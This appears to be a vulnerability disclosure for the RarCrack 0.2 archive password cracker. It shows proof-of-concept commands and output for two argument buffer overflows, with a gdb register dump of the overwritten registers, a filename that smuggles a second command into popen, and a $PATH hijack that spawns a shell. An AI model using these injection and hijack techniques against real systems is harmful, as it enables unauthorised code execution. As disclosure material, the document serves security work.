RarCrack!

RarCrack! is a simple brute force password cracker for archives. RarCrack! has multiple bad practices which could cause security problems e.g. when embedded with other programs.

Buffer Overflow: filename parameter (caught by FORTIFY_SOURCE)

$ /usr/bin/rarcrack $(python3 -c 'print("A"*500)')
RarCrack! 0.2 by David Zoltan Kedves (kedazo@gmail.com)

*** buffer overflow detected ***: /usr/bin/rarcrack terminated
======= Backtrace: =========
/lib/x86_64-linux-gnu/libc.so.6(+0x70bfb)[0x7faa1c861bfb]
/lib/x86_64-linux-gnu/libc.so.6(__fortify_fail+0x37)[0x7faa1c8ea1f7]
/lib/x86_64-linux-gnu/libc.so.6(+0xf7330)[0x7faa1c8e8330]
/lib/x86_64-linux-gnu/libc.so.6(+0xf6692)[0x7faa1c8e7692]
/usr/bin/rarcrack(+0x2477)[0x55565707e477]
/usr/bin/rarcrack(+0x1481)[0x55565707d481]
/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf1)[0x7faa1c8112e1]
/usr/bin/rarcrack(+0x14fa)[0x55565707d4fa]
...

Buffer Overflow: type parameter

$ gdb -ex=r --args /usr/bin/rarcrack --type $(python3 -c 'print("A"*400)')
...
RarCrack! 0.2 by David Zoltan Kedves (kedazo@gmail.com)

WARNING: invalid parameter --type AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA!
ERROR: The specified file () is not exists or
       you don't have a right permissions!

Program received signal SIGSEGV, Segmentation fault.
0x000055555555644d in ?? ()
(gdb) i r
rax            0x2b     43
rbx            0x4141414141414141       4702111234474983745
rcx            0x7ffff753d730   140737342854960
rdx            0x7ffff77fd760   140737345738592
rsi            0x55555576ac20   93824994421792
rdi            0x0      0
rbp            0x4141414141414141       0x4141414141414141
rsp            0x7fffffffe3a8   0x7fffffffe3a8
r8             0x7ffff7fccd00   140737353927936
r9             0x2f     47
r10            0x73     115
r11            0x246    582
r12            0x4141414141414141       4702111234474983745
r13            0x4141414141414141       4702111234474983745
r14            0x4141414141414141       4702111234474983745
r15            0x4141414141414141       4702111234474983745
rip            0x55555555644d   0x55555555644d
eflags         0x10206  [ PF IF RF ]
cs             0x33     51
ss             0x2b     43
ds             0x0      0
es             0x0      0
fs             0x0      0
gs             0x0      0

Command Injection: passing strings directly into popen

$ export c='; id > b' && touch "$c"  && /usr/bin/rarcrack "$c" && cat b
RarCrack! 0.2 by David Zoltan Kedves (kedazo@gmail.com)

Usage: file [-bcEhikLlNnprsvzZ0] [--apple] [--extension] [--mime-encoding] [--mime-type]
            [-e testname] [-F separator] [-f namefile] [-m magicfiles] file ...
       file -C [-m magicfiles]
       file [--help]
INFO: detected file type:
ERROR: Couldn't detect archive type
uid=1002(pwn) gid=1002(pwn) groups=1002(pwn)

Command Injection: by trusting $PATH

$ echo -e '#!/bin/sh\n/bin/sh 1>&2' > file && chmod +x file && PATH=$(pwd) /usr/bin/rarcrack /usr/bin/rarcrack
RarCrack! 0.2 by David Zoltan Kedves (kedazo@gmail.com)

$ /usr/bin/id
uid=1002(pwn) gid=1002(pwn) groups=1002(pwn)